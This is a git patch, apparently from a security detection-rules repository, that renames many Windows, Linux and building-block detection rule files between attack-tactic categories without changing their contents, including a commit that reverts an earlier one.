b/rules/windows/defense_evasion_uac_bypass_diskcleanup_hijack.toml similarity index 100% rename from rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml rename to rules/windows/defense_evasion_uac_bypass_diskcleanup_hijack.toml diff --git a/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml b/rules/windows/defense_evasion_uac_bypass_dll_sideloading.toml similarity index 100% rename from rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml rename to rules/windows/defense_evasion_uac_bypass_dll_sideloading.toml diff --git a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml b/rules/windows/defense_evasion_uac_bypass_event_viewer.toml similarity index 100% rename from rules/windows/privilege_escalation_uac_bypass_event_viewer.toml rename to rules/windows/defense_evasion_uac_bypass_event_viewer.toml diff --git a/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml b/rules/windows/defense_evasion_uac_bypass_mock_windir.toml similarity index 100% rename from rules/windows/privilege_escalation_uac_bypass_mock_windir.toml rename to rules/windows/defense_evasion_uac_bypass_mock_windir.toml diff --git a/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml b/rules/windows/defense_evasion_uac_bypass_winfw_mmc_hijack.toml similarity index 100% rename from rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml rename to rules/windows/defense_evasion_uac_bypass_winfw_mmc_hijack.toml diff --git a/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml b/rules/windows/defense_evasion_unusual_parentchild_relationship.toml similarity index 100% rename from rules/windows/privilege_escalation_unusual_parentchild_relationship.toml rename to rules/windows/defense_evasion_unusual_parentchild_relationship.toml diff --git a/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml b/rules/windows/defense_evasion_unusual_svchost_childproc_childless.toml similarity index 100% rename from rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml rename to rules/windows/defense_evasion_unusual_svchost_childproc_childless.toml diff --git a/rules/windows/initial_access_url_cve_2025_33053.toml b/rules/windows/defense_evasion_url_cve_2025_33053.toml similarity index 100% rename from rules/windows/initial_access_url_cve_2025_33053.toml rename to rules/windows/defense_evasion_url_cve_2025_33053.toml diff --git a/rules/windows/persistence_via_bits_job_notify_command.toml b/rules/windows/defense_evasion_via_bits_job_notify_command.toml similarity index 100% rename from rules/windows/persistence_via_bits_job_notify_command.toml rename to rules/windows/defense_evasion_via_bits_job_notify_command.toml diff --git a/rules/windows/execution_via_compiled_html_file.toml b/rules/windows/defense_evasion_via_compiled_html_file.toml similarity index 100% rename from rules/windows/execution_via_compiled_html_file.toml rename to rules/windows/defense_evasion_via_compiled_html_file.toml diff --git a/rules/windows/persistence_via_hidden_run_key_valuename.toml b/rules/windows/defense_evasion_via_hidden_run_key_valuename.toml similarity index 100% rename from rules/windows/persistence_via_hidden_run_key_valuename.toml rename to rules/windows/defense_evasion_via_hidden_run_key_valuename.toml diff --git a/rules/windows/execution_via_hidden_shell_conhost.toml b/rules/windows/defense_evasion_via_hidden_shell_conhost.toml similarity index 100% rename from rules/windows/execution_via_hidden_shell_conhost.toml rename to rules/windows/defense_evasion_via_hidden_shell_conhost.toml diff --git a/rules/windows/execution_via_mmc_console_file_unusual_path.toml b/rules/windows/defense_evasion_via_mmc_console_file_unusual_path.toml similarity index 100% rename from rules/windows/execution_via_mmc_console_file_unusual_path.toml rename to rules/windows/defense_evasion_via_mmc_console_file_unusual_path.toml diff --git a/rules/windows/privilege_escalation_via_token_theft.toml b/rules/windows/defense_evasion_via_token_theft.toml similarity index 100% rename from rules/windows/privilege_escalation_via_token_theft.toml rename to rules/windows/defense_evasion_via_token_theft.toml diff --git a/rules/windows/execution_windows_cmd_shell_susp_args.toml b/rules/windows/defense_evasion_windows_cmd_shell_susp_args.toml similarity index 100% rename from rules/windows/execution_windows_cmd_shell_susp_args.toml rename to rules/windows/defense_evasion_windows_cmd_shell_susp_args.toml diff --git a/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml b/rules/windows/defense_evasion_windows_fakecaptcha_cmd_ps.toml similarity index 100% rename from rules/windows/execution_windows_fakecaptcha_cmd_ps.toml rename to rules/windows/defense_evasion_windows_fakecaptcha_cmd_ps.toml diff --git a/rules/windows/execution_windows_powershell_susp_args.toml b/rules/windows/defense_evasion_windows_powershell_susp_args.toml similarity index 100% rename from rules/windows/execution_windows_powershell_susp_args.toml rename to rules/windows/defense_evasion_windows_powershell_susp_args.toml diff --git a/rules/windows/execution_windows_script_from_internet.toml b/rules/windows/defense_evasion_windows_script_from_internet.toml similarity index 100% rename from rules/windows/execution_windows_script_from_internet.toml rename to rules/windows/defense_evasion_windows_script_from_internet.toml diff --git a/rules/windows/initial_access_xsl_script_execution_via_com.toml b/rules/windows/defense_evasion_xsl_script_execution_via_com.toml similarity index 100% rename from rules/windows/initial_access_xsl_script_execution_via_com.toml rename to rules/windows/defense_evasion_xsl_script_execution_via_com.toml diff --git a/rules/windows/execution_enumeration_via_wmiprvse.toml b/rules/windows/discovery_enumeration_via_wmiprvse.toml similarity index 100% rename from rules/windows/execution_enumeration_via_wmiprvse.toml rename to rules/windows/discovery_enumeration_via_wmiprvse.toml diff --git a/rules/windows/lateral_movement_cmd_service.toml b/rules/windows/execution_cmd_service.toml similarity index 100% rename from rules/windows/lateral_movement_cmd_service.toml rename to rules/windows/execution_cmd_service.toml diff --git a/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml b/rules/windows/execution_dcom_shellwindow_shellbrowserwindow.toml similarity index 100% rename from rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml rename to rules/windows/execution_dcom_shellwindow_shellbrowserwindow.toml diff --git a/rules/windows/privilege_escalation_group_policy_scheduled_task.toml b/rules/windows/execution_group_policy_scheduled_task.toml similarity index 100% rename from rules/windows/privilege_escalation_group_policy_scheduled_task.toml rename to rules/windows/execution_group_policy_scheduled_task.toml diff --git a/rules/windows/lateral_movement_incoming_wmi.toml b/rules/windows/execution_incoming_wmi.toml similarity index 100% rename from rules/windows/lateral_movement_incoming_wmi.toml rename to rules/windows/execution_incoming_wmi.toml diff --git a/rules/windows/initial_access_rdp_file_mail_attachment.toml b/rules/windows/execution_rdp_file_mail_attachment.toml similarity index 100% rename from rules/windows/initial_access_rdp_file_mail_attachment.toml rename to rules/windows/execution_rdp_file_mail_attachment.toml diff --git a/rules/windows/lateral_movement_remote_services.toml b/rules/windows/execution_remote_services.toml similarity index 100% rename from rules/windows/lateral_movement_remote_services.toml rename to rules/windows/execution_remote_services.toml diff --git a/rules/windows/lateral_movement_remote_task_creation_winlog.toml b/rules/windows/execution_remote_task_creation_winlog.toml similarity index 100% rename from rules/windows/lateral_movement_remote_task_creation_winlog.toml rename to rules/windows/execution_remote_task_creation_winlog.toml diff --git a/rules/windows/lateral_movement_scheduled_task_target.toml b/rules/windows/execution_scheduled_task_target.toml similarity index 100% rename from rules/windows/lateral_movement_scheduled_task_target.toml rename to rules/windows/execution_scheduled_task_target.toml diff --git a/rules/windows/initial_access_script_executing_powershell.toml b/rules/windows/execution_script_executing_powershell.toml similarity index 100% rename from rules/windows/initial_access_script_executing_powershell.toml rename to rules/windows/execution_script_executing_powershell.toml diff --git a/rules/windows/initial_access_scripts_process_started_via_wmi.toml b/rules/windows/execution_scripts_process_started_via_wmi.toml similarity index 100% rename from rules/windows/initial_access_scripts_process_started_via_wmi.toml rename to rules/windows/execution_scripts_process_started_via_wmi.toml diff --git a/rules/windows/privilege_escalation_service_control_spawned_script_int.toml b/rules/windows/execution_service_control_spawned_script_int.toml similarity index 100% rename from rules/windows/privilege_escalation_service_control_spawned_script_int.toml rename to rules/windows/execution_service_control_spawned_script_int.toml diff --git a/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml b/rules/windows/execution_suspicious_ms_exchange_worker_child_process.toml similarity index 100% rename from rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml rename to rules/windows/execution_suspicious_ms_exchange_worker_child_process.toml diff --git a/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml b/rules/windows/execution_suspicious_ms_outlook_child_process.toml similarity index 100% rename from rules/windows/initial_access_suspicious_ms_outlook_child_process.toml rename to rules/windows/execution_suspicious_ms_outlook_child_process.toml diff --git a/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml b/rules/windows/execution_suspicious_process_access_direct_syscall.toml similarity index 100% rename from rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml rename to rules/windows/execution_suspicious_process_access_direct_syscall.toml diff --git a/rules/windows/persistence_suspicious_scheduled_task_runtime.toml b/rules/windows/execution_suspicious_scheduled_task_runtime.toml similarity index 100% rename from rules/windows/persistence_suspicious_scheduled_task_runtime.toml rename to rules/windows/execution_suspicious_scheduled_task_runtime.toml diff --git a/rules/windows/defense_evasion_suspicious_zoom_child_process.toml b/rules/windows/execution_suspicious_zoom_child_process.toml similarity index 100% rename from rules/windows/defense_evasion_suspicious_zoom_child_process.toml rename to rules/windows/execution_suspicious_zoom_child_process.toml diff --git a/rules/windows/persistence_system_shells_via_services.toml b/rules/windows/execution_system_shells_via_services.toml similarity index 100% rename from rules/windows/persistence_system_shells_via_services.toml rename to rules/windows/execution_system_shells_via_services.toml diff --git a/rules/windows/persistence_temp_scheduled_task.toml b/rules/windows/execution_temp_scheduled_task.toml similarity index 100% rename from rules/windows/persistence_temp_scheduled_task.toml rename to rules/windows/execution_temp_scheduled_task.toml diff --git a/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml b/rules/windows/execution_via_explorer_suspicious_child_parent_args.toml similarity index 100% rename from rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml rename to rules/windows/execution_via_explorer_suspicious_child_parent_args.toml diff --git a/rules/windows/persistence_via_wmi_stdregprov_run_services.toml b/rules/windows/execution_via_wmi_stdregprov_run_services.toml similarity index 100% rename from rules/windows/persistence_via_wmi_stdregprov_run_services.toml rename to rules/windows/execution_via_wmi_stdregprov_run_services.toml diff --git a/rules/windows/lateral_movement_via_wsus_update.toml b/rules/windows/execution_via_wsus_update.toml similarity index 100% rename from rules/windows/lateral_movement_via_wsus_update.toml rename to rules/windows/execution_via_wsus_update.toml diff --git a/rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml b/rules/windows/execution_via_xp_cmdshell_mssql_stored_procedure.toml similarity index 100% rename from rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml rename to rules/windows/execution_via_xp_cmdshell_mssql_stored_procedure.toml diff --git a/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml b/rules/windows/execution_volume_shadow_copy_deletion_via_powershell.toml similarity index 100% rename from rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml rename to rules/windows/execution_volume_shadow_copy_deletion_via_powershell.toml diff --git a/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml b/rules/windows/execution_volume_shadow_copy_deletion_via_wmic.toml similarity index 100% rename from rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml rename to rules/windows/execution_volume_shadow_copy_deletion_via_wmic.toml diff --git a/rules/windows/persistence_webshell_detection.toml b/rules/windows/execution_webshell_detection.toml similarity index 100% rename from rules/windows/persistence_webshell_detection.toml rename to rules/windows/execution_webshell_detection.toml diff --git a/rules/windows/initial_access_webshell_screenconnect_server.toml b/rules/windows/execution_webshell_screenconnect_server.toml similarity index 100% rename from rules/windows/initial_access_webshell_screenconnect_server.toml rename to rules/windows/execution_webshell_screenconnect_server.toml diff --git a/rules/windows/defense_evasion_wsl_bash_exec.toml b/rules/windows/execution_wsl_bash_exec.toml similarity index 100% rename from rules/windows/defense_evasion_wsl_bash_exec.toml rename to rules/windows/execution_wsl_bash_exec.toml diff --git a/rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml b/rules/windows/initial_access_account_takeover_mixed_logon_types.toml similarity index 100% rename from rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml rename to rules/windows/initial_access_account_takeover_mixed_logon_types.toml diff --git a/rules/windows/execution_downloaded_shortcut_files.toml b/rules/windows/initial_access_downloaded_shortcut_files.toml similarity index 100% rename from rules/windows/execution_downloaded_shortcut_files.toml rename to rules/windows/initial_access_downloaded_shortcut_files.toml diff --git a/rules/windows/execution_downloaded_url_file.toml b/rules/windows/initial_access_downloaded_url_file.toml similarity index 100% rename from rules/windows/execution_downloaded_url_file.toml rename to rules/windows/initial_access_downloaded_url_file.toml diff --git a/rules/windows/privilege_escalation_takeover_new_source_ip.toml b/rules/windows/initial_access_takeover_new_source_ip.toml similarity index 100% rename from rules/windows/privilege_escalation_takeover_new_source_ip.toml rename to rules/windows/initial_access_takeover_new_source_ip.toml diff --git a/rules/windows/lateral_movement_unusual_dns_service_children.toml b/rules/windows/initial_access_unusual_dns_service_children.toml similarity index 100% rename from rules/windows/lateral_movement_unusual_dns_service_children.toml rename to rules/windows/initial_access_unusual_dns_service_children.toml diff --git a/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml b/rules/windows/initial_access_unusual_dns_service_file_writes.toml similarity index 100% rename from rules/windows/lateral_movement_unusual_dns_service_file_writes.toml rename to rules/windows/initial_access_unusual_dns_service_file_writes.toml diff --git a/rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml b/rules/windows/persistence_badsuccessor_dmsa_abuse.toml similarity index 100% rename from rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml rename to rules/windows/persistence_badsuccessor_dmsa_abuse.toml diff --git a/rules/windows/privilege_escalation_credroaming_ldap.toml b/rules/windows/persistence_credroaming_ldap.toml similarity index 100% rename from rules/windows/privilege_escalation_credroaming_ldap.toml rename to rules/windows/persistence_credroaming_ldap.toml diff --git a/rules/windows/credential_access_dcsync_user_backdoor.toml b/rules/windows/persistence_dcsync_user_backdoor.toml similarity index 100% rename from rules/windows/credential_access_dcsync_user_backdoor.toml rename to rules/windows/persistence_dcsync_user_backdoor.toml diff --git a/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml b/rules/windows/persistence_dmsa_creation_by_unusual_user.toml similarity index 100% rename from rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml rename to rules/windows/persistence_dmsa_creation_by_unusual_user.toml diff --git a/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml b/rules/windows/persistence_dns_serverlevelplugindll.toml similarity index 100% rename from rules/windows/privilege_escalation_dns_serverlevelplugindll.toml rename to rules/windows/persistence_dns_serverlevelplugindll.toml diff --git a/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml b/rules/windows/persistence_gpo_schtask_service_creation.toml similarity index 100% rename from rules/windows/privilege_escalation_gpo_schtask_service_creation.toml rename to rules/windows/persistence_gpo_schtask_service_creation.toml diff --git a/rules/windows/privilege_escalation_group_policy_iniscript.toml b/rules/windows/persistence_group_policy_iniscript.toml similarity index 100% rename from rules/windows/privilege_escalation_group_policy_iniscript.toml rename to rules/windows/persistence_group_policy_iniscript.toml diff --git a/rules/windows/privilege_escalation_lsa_auth_package.toml b/rules/windows/persistence_lsa_auth_package.toml similarity index 100% rename from rules/windows/privilege_escalation_lsa_auth_package.toml rename to rules/windows/persistence_lsa_auth_package.toml diff --git a/rules/windows/credential_access_lsass_loaded_susp_dll.toml b/rules/windows/persistence_lsass_loaded_susp_dll.toml similarity index 100% rename from rules/windows/credential_access_lsass_loaded_susp_dll.toml rename to rules/windows/persistence_lsass_loaded_susp_dll.toml diff --git a/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml b/rules/windows/persistence_masquerading_suspicious_werfault_childproc.toml similarity index 100% rename from rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml rename to rules/windows/persistence_masquerading_suspicious_werfault_childproc.toml diff --git a/rules/windows/command_and_control_outlook_home_page.toml b/rules/windows/persistence_outlook_home_page.toml similarity index 100% rename from rules/windows/command_and_control_outlook_home_page.toml rename to rules/windows/persistence_outlook_home_page.toml diff --git a/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml b/rules/windows/persistence_port_monitor_print_processor_abuse.toml similarity index 100% rename from rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml rename to rules/windows/persistence_port_monitor_print_processor_abuse.toml diff --git a/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml b/rules/windows/persistence_reg_service_imagepath_mod.toml similarity index 100% rename from rules/windows/privilege_escalation_reg_service_imagepath_mod.toml rename to rules/windows/persistence_reg_service_imagepath_mod.toml diff --git a/rules/windows/defense_evasion_regmod_remotemonologue.toml b/rules/windows/persistence_regmod_remotemonologue.toml similarity index 100% rename from rules/windows/defense_evasion_regmod_remotemonologue.toml rename to rules/windows/persistence_regmod_remotemonologue.toml diff --git a/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml b/rules/windows/persistence_scheduledjobs_at_protocol_enabled.toml similarity index 100% rename from rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml rename to rules/windows/persistence_scheduledjobs_at_protocol_enabled.toml diff --git a/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml b/rules/windows/persistence_seenabledelegationprivilege_assigned_to_user.toml similarity index 100% rename from rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml rename to rules/windows/persistence_seenabledelegationprivilege_assigned_to_user.toml diff --git a/rules/windows/credential_access_shadow_credentials.toml b/rules/windows/persistence_shadow_credentials.toml similarity index 100% rename from rules/windows/credential_access_shadow_credentials.toml rename to rules/windows/persistence_shadow_credentials.toml diff --git a/rules/windows/execution_shared_modules_local_sxs_dll.toml b/rules/windows/persistence_shared_modules_local_sxs_dll.toml similarity index 100% rename from rules/windows/execution_shared_modules_local_sxs_dll.toml rename to rules/windows/persistence_shared_modules_local_sxs_dll.toml diff --git a/rules/windows/credential_access_spn_attribute_modified.toml b/rules/windows/persistence_spn_attribute_modified.toml similarity index 100% rename from rules/windows/credential_access_spn_attribute_modified.toml rename to rules/windows/persistence_spn_attribute_modified.toml diff --git a/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml b/rules/windows/persistence_windows_service_via_unusual_client.toml similarity index 100% rename from rules/windows/privilege_escalation_windows_service_via_unusual_client.toml rename to rules/windows/persistence_windows_service_via_unusual_client.toml diff --git a/rules_building_block/execution_github_new_repo_interaction_for_pat.toml b/rules_building_block/collection_github_new_repo_interaction_for_pat.toml similarity index 100% rename from rules_building_block/execution_github_new_repo_interaction_for_pat.toml rename to rules_building_block/collection_github_new_repo_interaction_for_pat.toml diff --git a/rules_building_block/execution_github_new_repo_interaction_for_user.toml b/rules_building_block/collection_github_new_repo_interaction_for_user.toml similarity index 100% rename from rules_building_block/execution_github_new_repo_interaction_for_user.toml rename to rules_building_block/collection_github_new_repo_interaction_for_user.toml diff --git a/rules_building_block/execution_github_repo_interaction_from_new_ip.toml b/rules_building_block/collection_github_repo_interaction_from_new_ip.toml similarity index 100% rename from rules_building_block/execution_github_repo_interaction_from_new_ip.toml rename to rules_building_block/collection_github_repo_interaction_from_new_ip.toml diff --git a/rules_building_block/discovery_capnetraw_capability.toml b/rules_building_block/credential_access_capnetraw_capability.toml similarity index 100% rename from rules_building_block/discovery_capnetraw_capability.toml rename to rules_building_block/credential_access_capnetraw_capability.toml diff --git a/rules_building_block/initial_access_okta_admin_console_login_failure.toml b/rules_building_block/credential_access_okta_admin_console_login_failure.toml similarity index 100% rename from rules_building_block/initial_access_okta_admin_console_login_failure.toml rename to rules_building_block/credential_access_okta_admin_console_login_failure.toml diff --git a/rules_building_block/command_and_control_bitsadmin_activity.toml b/rules_building_block/defense_evasion_bitsadmin_activity.toml similarity index 100% rename from rules_building_block/command_and_control_bitsadmin_activity.toml rename to rules_building_block/defense_evasion_bitsadmin_activity.toml diff --git a/rules_building_block/initial_access_github_new_ip_address_for_pat.toml b/rules_building_block/defense_evasion_github_new_ip_address_for_pat.toml similarity index 100% rename from rules_building_block/initial_access_github_new_ip_address_for_pat.toml rename to rules_building_block/defense_evasion_github_new_ip_address_for_pat.toml diff --git a/rules_building_block/persistence_github_new_pat_for_user.toml b/rules_building_block/defense_evasion_github_new_pat_for_user.toml similarity index 100% rename from rules_building_block/persistence_github_new_pat_for_user.toml rename to rules_building_block/defense_evasion_github_new_pat_for_user.toml diff --git a/rules_building_block/discovery_linux_sysctl_enumeration.toml b/rules_building_block/defense_evasion_linux_sysctl_enumeration.toml similarity index 100% rename from rules_building_block/discovery_linux_sysctl_enumeration.toml rename to rules_building_block/defense_evasion_linux_sysctl_enumeration.toml diff --git a/rules_building_block/credential_access_mdmp_file_unusual_extension.toml b/rules_building_block/defense_evasion_mdmp_file_unusual_extension.toml similarity index 100% rename from rules_building_block/credential_access_mdmp_file_unusual_extension.toml rename to rules_building_block/defense_evasion_mdmp_file_unusual_extension.toml diff --git a/rules_building_block/execution_settingcontent_ms_file_creation.toml b/rules_building_block/defense_evasion_settingcontent_ms_file_creation.toml similarity index 100% rename from rules_building_block/execution_settingcontent_ms_file_creation.toml rename to rules_building_block/defense_evasion_settingcontent_ms_file_creation.toml diff --git a/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml b/rules_building_block/defense_evasion_sts_getsessiontoken_abuse.toml similarity index 100% rename from rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml rename to rules_building_block/defense_evasion_sts_getsessiontoken_abuse.toml diff --git a/rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml b/rules_building_block/execution_anomalous_rsc_flight_data_patterns.toml similarity index 100% rename from rules_building_block/initial_access_anomalous_rsc_flight_data_patterns.toml rename to rules_building_block/execution_anomalous_rsc_flight_data_patterns.toml diff --git a/rules_building_block/lateral_movement_at.toml b/rules_building_block/execution_at.toml similarity index 100% rename from rules_building_block/lateral_movement_at.toml rename to rules_building_block/execution_at.toml diff --git a/rules_building_block/defense_evasion_download_susp_extension.toml b/rules_building_block/execution_download_susp_extension.toml similarity index 100% rename from rules_building_block/defense_evasion_download_susp_extension.toml rename to rules_building_block/execution_download_susp_extension.toml diff --git a/rules_building_block/defense_evasion_injection_from_msoffice.toml b/rules_building_block/execution_injection_from_msoffice.toml similarity index 100% rename from rules_building_block/defense_evasion_injection_from_msoffice.toml rename to rules_building_block/execution_injection_from_msoffice.toml diff --git a/rules_building_block/defense_evasion_outlook_suspicious_child.toml b/rules_building_block/execution_outlook_suspicious_child.toml similarity index 100% rename from rules_building_block/defense_evasion_outlook_suspicious_child.toml rename to rules_building_block/execution_outlook_suspicious_child.toml diff --git a/rules_building_block/lateral_movement_posh_winrm_activity.toml b/rules_building_block/execution_posh_winrm_activity.toml similarity index 100% rename from rules_building_block/lateral_movement_posh_winrm_activity.toml rename to rules_building_block/execution_posh_winrm_activity.toml diff --git a/rules_building_block/lateral_movement_unusual_process_sql_accounts.toml b/rules_building_block/execution_unusual_process_sql_accounts.toml similarity index 100% rename from rules_building_block/lateral_movement_unusual_process_sql_accounts.toml rename to rules_building_block/execution_unusual_process_sql_accounts.toml diff --git a/rules_building_block/lateral_movement_wmic_remote.toml b/rules_building_block/execution_wmic_remote.toml similarity index 100% rename from rules_building_block/lateral_movement_wmic_remote.toml rename to rules_building_block/execution_wmic_remote.toml diff --git a/rules_building_block/credential_access_entra_id_risk_detection_signal.toml b/rules_building_block/initial_access_entra_id_risk_detection_signal.toml similarity index 100% rename from rules_building_block/credential_access_entra_id_risk_detection_signal.toml rename to rules_building_block/initial_access_entra_id_risk_detection_signal.toml diff --git a/rules_building_block/persistence_web_server_potential_sql_injection.toml b/rules_building_block/initial_access_web_server_potential_sql_injection.toml similarity index 100% rename from rules_building_block/persistence_web_server_potential_sql_injection.toml rename to rules_building_block/initial_access_web_server_potential_sql_injection.toml diff --git a/rules_building_block/execution_github_new_event_action_for_pat.toml b/rules_building_block/persistence_github_new_event_action_for_pat.toml similarity index 100% rename from rules_building_block/execution_github_new_event_action_for_pat.toml rename to rules_building_block/persistence_github_new_event_action_for_pat.toml diff --git a/rules_building_block/discovery_linux_modprobe_enumeration.toml b/rules_building_block/persistence_linux_modprobe_enumeration.toml similarity index 100% rename from rules_building_block/discovery_linux_modprobe_enumeration.toml rename to rules_building_block/persistence_linux_modprobe_enumeration.toml diff --git a/rules_building_block/defense_evasion_service_path_registry.toml b/rules_building_block/persistence_service_path_registry.toml similarity index 100% rename from rules_building_block/defense_evasion_service_path_registry.toml rename to rules_building_block/persistence_service_path_registry.toml diff --git a/rules_building_block/defense_evasion_services_exe_path.toml b/rules_building_block/persistence_services_exe_path.toml similarity index 100% rename from rules_building_block/defense_evasion_services_exe_path.toml rename to rules_building_block/persistence_services_exe_path.toml diff --git a/rules_building_block/defense_evasion_write_dac_access.toml b/rules_building_block/persistence_write_dac_access.toml similarity index 100% rename from rules_building_block/defense_evasion_write_dac_access.toml rename to rules_building_block/persistence_write_dac_access.toml diff --git a/rules_building_block/execution_github_repo_created.toml b/rules_building_block/resource_development_github_repo_created.toml similarity index 100% rename from rules_building_block/execution_github_repo_created.toml rename to rules_building_block/resource_development_github_repo_created.toml From cb16aeea8daba2374b2f347ca89ea883869c019b Mon Sep 17 00:00:00 2001 From: Ruben Groenewoud Date: Tue, 24 Mar 2026 11:15:08 +0100 Subject: [PATCH 07/16] Revert "__" This reverts commit 9ae86ae3b410aa5c5a8b2df2a5f770fdb10bae26. --- ...on.toml => command_and_control_cupsd_foomatic_rip_netcon.toml} | 0 ..._netcon.toml => command_and_control_linux_kworker_netcon.toml} | 0 ...les.toml => credential_access_collection_sensitive_files.toml} | 0 ..._collection_sensitive_files_compression_inside_container.toml} | 0 ...ss_hooking.toml => credential_access_gdb_process_hooking.toml} | 0 ...on.toml => defense_evasion_authorized_keys_file_deletion.toml} | 0 ...toml => defense_evasion_curl_or_wget_executed_via_lolbin.toml} | 0 ...ml => defense_evasion_interactive_shell_from_system_user.toml} | 0 ...ce_ld_so_creation.toml => defense_evasion_ld_so_creation.toml} | 0 ...ame_esxi_files.toml => defense_evasion_rename_esxi_files.toml} | 0 ..._deletion.toml => defense_evasion_user_or_group_deletion.toml} | 0 ...le_discovery.toml => discovery_kubeconfig_file_discovery.toml} | 0 ...oml => discovery_private_key_password_searching_activity.toml} | 0 ...oml => discovery_security_file_access_via_common_utility.toml} | 0 ...covery_suspicious_network_tool_launched_inside_container.toml} | 0 ...rinting.toml => discovery_virtual_machine_fingerprinting.toml} | 0 ...eated.toml => execution_abnormal_process_id_file_created.toml} | 0 ... execution_cupsd_foomatic_rip_suspicious_child_execution.toml} | 0 ...execution_egress_connection_from_entrypoint_in_container.toml} | 0 ...on.toml => execution_file_execution_followed_by_deletion.toml} | 0 ...xecution_file_made_executable_via_chmod_inside_container.toml} | 0 ...ecution_file_transfer_or_listener_established_via_netcat.toml} | 0 ...execution_kubernetes_direct_api_request_via_curl_or_wget.toml} | 0 ...ener_via_rlwrap.toml => execution_nc_listener_via_rlwrap.toml} | 0 ...nary.toml => execution_netcon_from_rwx_mem_region_binary.toml} | 0 ...ilation.toml => execution_network_event_post_compilation.toml} | 0 ..._executed.toml => execution_potential_hack_tool_executed.toml} | 0 ...toml => execution_process_backgrounded_by_unusual_parent.toml} | 0 ...e.toml => execution_process_started_from_process_id_file.toml} | 0 ... => execution_process_started_in_shared_memory_directory.toml} | 0 ...inux_binary.toml => execution_shell_evasion_linux_binary.toml} | 0 ..._server.toml => execution_shell_openssl_client_or_server.toml} | 0 ...d_process.toml => execution_shell_via_background_process.toml} | 0 ...inux.toml => execution_shell_via_child_tcp_utility_linux.toml} | 0 ...nux.toml => execution_shell_via_lolbin_interpreter_linux.toml} | 0 ...eter_linux.toml => execution_shell_via_meterpreter_linux.toml} | 0 ...ous_binary.toml => execution_shell_via_suspicious_binary.toml} | 0 ..._linux.toml => execution_shell_via_tcp_cli_utility_linux.toml} | 0 ..._linux.toml => execution_shell_via_udp_cli_utility_linux.toml} | 0 ...=> execution_sus_extraction_or_decrompression_via_funzip.toml} | 0 ... execution_suspicious_executable_running_system_commands.toml} | 0 ...l => execution_suspicious_mining_process_creation_events.toml} | 0 ...e.toml => execution_system_binary_file_permission_change.toml} | 0 ...se_evasion_tc_bpf_filter.toml => execution_tc_bpf_filter.toml} | 0 ...d_execution.toml => execution_unusual_kthreadd_execution.toml} | 0 ...l => execution_unusual_path_invocation_from_command_line.toml} | 0 ...xec_execution.toml => execution_unusual_pkexec_execution.toml} | 0 ..._dumping.toml => exfiltration_potential_database_dumping.toml} | 0 ...on.toml => impact_potential_bruteforce_malware_infection.toml} | 0 ...tivity.toml => lateral_movement_kubeconfig_file_activity.toml} | 0 ...m_download.toml => lateral_movement_ssh_it_worm_download.toml} | 0 ...oml => lateral_movement_telnet_network_activity_external.toml} | 0 ...cution.toml => persistence_apt_package_manager_execution.toml} | 0 ...er_netcon.toml => persistence_apt_package_manager_netcon.toml} | 0 ...tion_at_job_creation.toml => persistence_at_job_creation.toml} | 0 ...vasion_boot_file_copy.toml => persistence_boot_file_copy.toml} | 0 ...robe_write_user.toml => persistence_bpf_probe_write_user.toml} | 0 ..._or_map_load.toml => persistence_bpf_program_or_map_load.toml} | 0 ...oml => persistence_credential_access_modify_ssh_binaries.toml} | 0 ..._cron_job_creation.toml => persistence_cron_job_creation.toml} | 0 ....toml => persistence_dbus_unsual_daemon_parent_execution.toml} | 0 ...it_hook_execution.toml => persistence_git_hook_execution.toml} | 0 ...trol_git_hook_netcon.toml => persistence_git_hook_netcon.toml} | 0 ...execution.toml => persistence_git_hook_process_execution.toml} | 0 ...odule_load.toml => persistence_insmod_kernel_module_load.toml} | 0 ...ernel_driver_load.toml => persistence_kernel_driver_load.toml} | 0 ..._root.toml => persistence_kernel_driver_load_by_non_root.toml} | 0 ... => persistence_kernel_module_load_from_unusual_location.toml} | 0 ..._file_creation.toml => persistence_kworker_file_creation.toml} | 0 